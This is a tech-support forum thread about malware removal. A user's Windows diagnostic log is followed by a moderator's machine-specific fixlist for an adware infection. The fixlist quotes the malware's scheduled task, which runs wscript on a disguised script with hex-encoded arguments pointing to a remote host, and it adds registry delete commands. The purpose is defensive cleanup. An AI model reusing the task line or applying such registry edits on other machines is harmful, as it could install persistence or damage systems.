FirewallRules: [{E570629D-8F34-4A8B-A894-67EB3D7230DE}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{A485E48D-E98B-45F4-9AE6-87725371FD19}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{AFC4EBBD-4CDB-4FEB-A95D-C457F1822FC6}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{10C84A3D-8C0A-4028-BC85-82927C0EEF55}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/08/2015 06:51:39 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HPENVYPC)
Description: Activation of app Microsoft.MicrosoftMahjong_8wekyb3d8bbwe!MicrosoftMahjong failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (11/08/2015 05:34:56 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HPENVYPC)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147023174 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (11/08/2015 05:34:56 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HPENVYPC)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147023174 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (11/08/2015 05:34:56 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HPENVYPC)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147023174 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (11/08/2015 05:34:56 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HPENVYPC)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147023174 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (11/08/2015 05:34:56 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HPENVYPC)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147023174 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (11/08/2015 05:34:56 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HPENVYPC)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147023174 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (11/08/2015 05:34:56 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HPENVYPC)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147023174 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (11/08/2015 05:34:56 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HPENVYPC)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147023174 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (11/07/2015 07:06:38 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HPENVYPC)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147023174 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
 
System errors:
=============
Error: (11/07/2015 09:57:05 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Biometric Service service depends on the Credential Manager service which failed to start because of the following error: 
%%1058
 
Error: (11/07/2015 09:57:04 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Biometric Service service depends on the Credential Manager service which failed to start because of the following error: 
%%1058
 
Error: (11/07/2015 09:57:03 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Biometric Service service depends on the Credential Manager service which failed to start because of the following error: 
%%1058
 
Error: (11/07/2015 09:57:02 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Biometric Service service depends on the Credential Manager service which failed to start because of the following error: 
%%1058
 
Error: (11/07/2015 09:57:00 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Biometric Service service depends on the Credential Manager service which failed to start because of the following error: 
%%1058
 
Error: (11/07/2015 09:56:59 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Biometric Service service depends on the Credential Manager service which failed to start because of the following error: 
%%1058
 
Error: (11/07/2015 09:56:58 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Biometric Service service depends on the Credential Manager service which failed to start because of the following error: 
%%1058
 
Error: (11/07/2015 09:56:57 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Biometric Service service depends on the Credential Manager service which failed to start because of the following error: 
%%1058
 
Error: (11/07/2015 09:56:56 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Biometric Service service depends on the Credential Manager service which failed to start because of the following error: 
%%1058
 
Error: (11/07/2015 09:56:55 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Biometric Service service depends on the Credential Manager service which failed to start because of the following error: 
%%1058
 
 
==================== Memory info =========================== 
 
Processor: AMD A10-6700 APU with Radeon™ HD Graphics 
Percentage of memory in use: 23%
Total physical RAM: 11445.18 MB
Available physical RAM: 8744.37 MB
Total Virtual: 13173.18 MB
Available Virtual: 9311.39 MB
 
==================== Drives ================================
 
Drive c: (Windows) (Fixed) (Total:1846.24 GB) (Free:1773.11 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Recovery Image) (Fixed) (Total:15.3 GB) (Free:1.85 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive f: (98SE_FAT32) (Fixed) (Total:78.45 GB) (Free:71.63 GB) FAT32
Drive g: (XP_NTFS) (Fixed) (Total:70.58 GB) (Free:41.83 GB) NTFS
Drive i: (Lexar) (Removable) (Total:7.45 GB) (Free:5.47 GB) FAT32
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 1863 GB) (Disk ID: 57D23B32)
 
Partition: GPT.
 
========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 149.1 GB) (Disk ID: 2A840EB2)
Partition 1: (Not Active) - (Size=78.5 GB) - (Type=0C)
Partition 2: (Not Active) - (Size=70.6 GB) - (Type=OF Extended)
 
========================================================
Disk: 2 (MBR Code: Windows XP) (Size: 7.5 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=7.5 GB) - (Type=0C)
 
==================== End of Addition.txt ============================
 
Is there a problem with my computer that I can repair with your help?

 


  • 0

Advertisements


#2
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Could you let me know if this stops the alerts

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:
 

CreateRestorePoint:
AppInit_DLLs-x32: C:\PROGRA~3\{6EB98~1\201~1.9\fico.dll => C:\ProgramData\{6EB9867A-3E3B-57FC-8FBD-277E5F3FF4F0}\2.0.1.9\fico.dll [606720 2015-08-03] ()
HKU\S-1-5-21-3264377140-702172241-3405489607-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKU\S-1-5-21-3264377140-702172241-3405489607-1001 -> {C71C5517-93E7-46AA-8EDD-1D624008A30F} URL = hxxp://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_tight14_15_32&cd=2XzuyEtN2Y1L1Qzu0AtD0DtA0CtCyEyE0ByEtDyCtBzzyDtBtN0D0Tzu0StCtAtCtDtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyD0D0AyE0DyCtC0CtGyD0FyCyBtG0AtD0E0CtGyByE0D0AtGyE0DyE0FyEyC0AyDtDyEzytB2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0CtAtCyC0BtDtA0BtG0A0EtA0FtGyE0E0CtCtGzy0ByDyBtG0FyC0Czy0C0ByE0E0FzytAzy2QtN0A0LzuyEtN1B2Z1V1T1S1NzuzytCtA&cr=1196457357&ir=
Task: {867D2054-0D0B-433B-9D15-6632AB4C0F12} - System32\Tasks\Cassiopesa fico => Wscript.exe "C:\ProgramData\{6EB9867A-3E3B-57FC-8FBD-277E5F3FF4F0}\2.0.1.9\cisa.txt" "433a2f50726f6772616d446174612f7b36454239383637412d334533422d353746432d384642442d3237374535463346463446307d2f322e302e312e392f6669636f2e646c6c" "687474703a2f2f73616f2e63737062696e742e636f6d2f" "--IsErIk" "//E:jscript"
C:\ProgramData\{6EB9867A-3E3B-57FC-8FBD-277E5F3FF4F0}
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers


Save this as fixlist.txt, in the same location as FRST.exe
FRSTfix.JPG
Run FRST and press Fix
On completion a log will be generated please post that
  • 0

#3
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts

Due to lack of feedback, this topic has been closed.

If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.


  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP